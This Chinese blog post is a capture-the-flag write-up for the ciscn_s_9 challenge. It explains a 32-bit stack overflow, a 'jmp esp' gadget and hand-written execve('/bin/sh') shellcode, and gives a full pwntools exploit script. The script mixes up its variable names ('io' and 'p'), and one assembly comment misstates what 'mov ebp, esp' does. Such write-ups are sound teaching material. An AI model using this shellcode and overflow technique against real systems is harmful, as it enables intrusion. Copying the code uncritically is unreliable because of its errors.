采用汇编手写shellcode写入栈解题ciscn_s_9

已于 2024-08-13 19:17:55 修改
阅读量467 收藏 5
点赞数 5
文章标签: 汇编 python 运维 linux
于 2024-08-13 19:15:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81504456/article/details/141170540
版权

pwntools工具生成的shellcode一般是70到100字节左右,采用shellocde = asm(shellcraft.sh())

而当缓冲区溢出的空间太少以至于自动生成的sc不能正常衔接ebp与返回地址时,需要手写shellocde填入缓冲区构造新的栈帧。

书写shellcode参考学习链接:

linux上的shellcode写法(pwntools,手写shell)_pwntools生成shellcode-CSDN博客

1.检查文件类型,32位,NX保护未打开。查看函数主要在pwn()部分,利用缓冲区读入的s溢出点,布局构造新的栈帧分布。

#main函数
int pwn()
{
  char s[24]; // [esp+8h] [ebp-20h]

  puts("\nHey! ^_^");
  puts("\nIt's nice to meet you");
  puts("\nDo you have anything to tell?");
  puts(">");
  fflush(stdout);
  fgets(s, 50, stdin);
  puts("OK bye~");
  fflush(stdout);
  return 1;
}

ida中还有hint函数,按tap键进入汇编窗口,代码如下:

push    ebp       #压入ebp
mov     ebp, esp  #将ebp的值赋予esp,及更新函数基址地址
jmp     esp       #跳转到当前函数的esp

它的作用是保存当前函数的调用者的栈帧指针(ebp),然后将当前栈指针(esp)赋值给ebp,最后通过跳转指令(jmp esp)将控制流转移到当前栈指针所指向的位置。也就是说创建了一个新的栈帧,将当前函数的栈指针设置为新的栈帧指针。利用此jmp esp的地址0x08048554作为返回地址。

2.接下来主要看栈的内部分配,已知s的输入点距离ebp为20h,加上ebp的4字节大小,共需要填充24h的shellcode(大小比这小,不够填充字节),再接上ret_addr,此时还未结束。

因为执行pop ebp 把esp栈顶的值给ebp,esp加4h,执行ret,即pop eip,把修改后的返回地址 0x08048554给eip,esp加4h,此时esp距离s是28h(有点昏,参考其他文章),原先的20h(s的缓冲区已经不够,需要增加8h的大小)需要扩充,利用sub esp,0x28;call esp结束跳转到esp,参考上图完成shellcode的写入。

汇编下的shellcode,一般得到shell都是传入"bin/sh"字符,x86下的shellcode如下:

xor eax,eax            #异或使得eax为0
xor ebx,ebx            #异或使得ebx为0
xor edx,edx            #异或使得edx为0
xor ecx,ecx            #异或使得ecx为0
push edx               #压入edx
push 0x68732f2f        #压入//sh
push 0x6e69622f        #压入/bin
mov ebx,esp            #让ebx指向esp
mov al,0xB             #给al赋值0xb
int 0x80               #执行0x80

 说明:

1.小端序下的bin/sh的ASCⅡ代码反过来输入,如"h"的ASCⅡ代码为0x68,"s"为0x73,"/"为0x2f。(输入//sh的原因是为了填充满4个字节,/bin/sh和/bin//sh等同)

2.al为eax寄存器的低8位,0xb是execve的系统调用号。(之前文章记载)

wp如下:欢迎各位师傅指正!

from pwn import *

io = remote('nodeX.buuoj.cn',XXXX)
#io = process('./ciscn_s_9')
context(log_level='debug',arch='i386',os='linux')

jump_esp=0x08048554

shellcode='''
xor eax,eax
xor edx,edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
mov al,0xB
int 0x80
'''

shellcode=asm(shellcode)

payload=shellcode.ljust(0x24,b'\x00')+p32(jump_esp)


payload+=asm("sub esp,40;call esp")

p.sendline(payload)
p.interactive()

承诺之时
关注
【pwn】ciscn_2019_s_3
Nothing
12-14 4583
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往数据(0x400),从上读数据(0x30),存在溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
BUUCTF迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1035
1.checksec+运行获取基本信息 32位+NX堆不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
[buuctf]ciscn_2019_s_9
逆向萌新的博客
07-15 1042
[buuctf]ciscn_2019_s_9
[BUUCTF] ciscn_2019_s_9
zyxx_wjc的博客
07-10 275
ciscn_2019_s_9
ciscn_2019_s_9
K1ose的博客
04-22 848
下载附件,file一下,是32bit程序; checksec一下; 基本没保护措施; IDA里分析一波; main()跳到pwn(); 看看pwn()的内容; 看到fgets立马想到溢出; 又注意到有一个hint()函数; 其内容如下: 这里直接跳到了$esp,$esp是在堆上的; 既然有溢出,可执行,又有一个跳转到$esp的函数,思路就很清晰了; 我们先利用溢出,覆盖pwn()函数的返回地址为jmp esp的地址,然后我们再使得$esp指向shellcode所在的地址,完美! 但是因为
[BUUCTF]PWN——ciscn_2019_s_9
BangSen1的博客
04-26 535
ciscn_2019_s_9 参考 例行检查 ,32位,未开启任何保护 运行一下。 32位ida载入,,第10行的fgets,能够溢出0x32-0x20-0x4个字节 没用nx保护,首先想到的就是往s里shellcode,然后跳转到s执行shellcode 生成的shellcode的长度过长,参数 s0x20(32) 不下。 shellcode =''' xor eax,eax #eax置0 xor edx,edx #edx置0 push edx #将0入栈,标
从BUUCTF之“ciscn_2019_s_9”见32位shellcode的简单法,以及其中的难解之处
Probeginner的博客
12-09 270
32位简单shellcode
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
在IT领域,shellcode是一种特殊的低级代码,通常用汇编语言编,用于利用软件漏洞进行攻击。在本例中,我们关注的是针对Linux x86架构的shellcodeshellcode的主要目标是获取一个shell,即操作系统命令解释器的...
buuctf ciscn_2019_n_5 ret2shellcode解题思路
weixin_45441024的博客
12-02 402
BUUCTF ciscn_2019_n_5 ret2shellcode check一下,最喜欢的一片红色,64位的程序 发现存在两次输入,那么我们就通过read将构造的shellcode上,然后在第二次的候通过构造溢出覆盖返回地址跳转到我们shellcode的这个地方,然后就开始构造吧: from pwn import * p=remote('node3.buuoj.cn',25157) sh="\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31
shellcode_generate-test_framework
04-06
shellcode_generate-test_framework 非原创,来自 本次工程创建是win32空项目,使用的是VS2015编译relase/x86,编译之前进行如下设置: 创建工程关闭SDL检查 属性->C/C++->代码生成->运行库->多线程 (/MT)如果是...
一个溢出的实验
学渣heviosr
07-26 2640
———-一:ret2addr和ret2reg(绕过随机化)———- 测试环境:Ubuntu 12.04 调试工具:gdb(可用图形界面工具:insight)+ core文件 说明:若直接在gdb里执行程序,地址空间和程序单独运行不同。程序出段错误可生成core文件,保存出错的上下文信息,结合gdb一起,可以得知程序单独运行的一些状态。实验前设置core文件大小:u
linux下漏洞利用方法——shellcode
weixin_42390670的博客
07-22 1485
废话不多说,直接拿出练习计划,事务的学习都应该从易到难,这样学习起来效率较高。 (PS:没有基础的先看下大神的入门介绍,个人感觉得深入浅出,很容易明白.https://zhuanlan.zhihu.com/p/25892385 首先学习linux下漏洞利用方法。国外有个大神已经总结了一波: https://sploitfun.wordpress.com/2015/ 。我是准备一个月学完这个。 ...
ciscn_2019_s_9详解
勿山几已
06-12 356
详解pwn入门题ciscn_2019_s_9
ShellCode和远程代码注入
&Ψ的博客
09-15 1565
文章目录1.ShellCode是什么2.ShellCode的编原则3.TEB与PEB1)TEB线程信息获取当前线程的TEB2)PEB进程环境块获取当前进程的TEBPEB_LDR_DATALDR_DATA_TABLE_ENTRY在任意进程中找到一个LDR_DATA_TABLE_ENTRY1.一些结构体的定义2.寻找方法4.ShellCode的实现思路5.远程注入代码6.关于我在vs2017编遇到的问题解决方法 1.ShellCode是什么 一段特殊的代码,不依赖与任何进程环境。简单来讲就是一段可以在Wi
20212405 2023-2024-2 《网络与系统攻防技术》实验二实验报告
最新发布
weixin_63057218的博客
04-01 665
本周在缓冲区溢出的基础之上介绍了堆溢出,在之前数据结构课的基础之上我学习了的结构,但是关于堆并没有很清晰的认知。然后也学习了三种溢出模式:NSR,RNS,RS。NSR模式主要适用于被溢出的缓冲区变量比较大,足以容纳Shellcode的情况。其攻击数据从低地址到高地址构造,包括Nop指令填充Shellcode和一些期望覆盖RET返回地址的跳转地址,从而构成NSR攻击数据缓冲区。RNS一般用于被溢出的变量比较小,不足于容纳Shellcode的情况。
32触发注入过程_墨云 I 技术课堂 — 内核APC注入shellcode调试分析
weixin_39678451的博客
01-12 547
背 景Shellcode是软件漏洞利用过程中的一小段机器代码,它被攻击者用来控制目标机器。Shellcode的编这方面被讨论的不是太多,原因是好多shellcode都是现成的,我们直接拿过来用就行了。最近在研究内核漏洞利用,发现内核漏洞利用的shellcode更多的是用来完成提权功能的,例如,一个ring3的程序触发漏洞之后执行内核shellcode,此shellcode只是把r...
20145307陈俊达《网络对抗》shellcode注入&return to libc
03-12 199
20145307陈俊达《网络对抗》shellcode注入 Shellcode注入 基础知识 Shellcode实际是一段代码,但却作为数据发送给受攻击服务器,将代码存储到对方的堆中,并将堆的返回地址利用缓冲区溢出,覆盖成为指向 shellcode地址。 实践过程 将环境设置为:堆可执行、地址随机化关闭 选择anything+retaddr+nops+shellcode的结构构...
Shellcode 开发关键技术
AlexYoung28的博客
10-15 1320
1. 位置代码无关性技术 定义:位置无关代码(PIC)是指不适用硬编码地址来寻址指令或数据的代码。 必要性:因为Shellcode被加载到内存地址执行,指令的内存地址是不确定的。 2.如何获取Shellcode起始位置 Shellcode在以位置无关方式访问,首先需要引用一个 基址指针,用该基址指针加上或减去一定的偏移,从而顺利 的访问shellcode中包含的数据。  Shel...
ARM汇编基础与Shellcode实战
"这篇文档是关于在ARM平台上编汇编语言SHELLCODE的教程,适合初学者入门。它涵盖了ARM汇编基础、常用指令、模式切换、地址计算、分支指令,以及如何编ARM Shellcode,包括系统调用、参数映射、逆向工程等实践...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值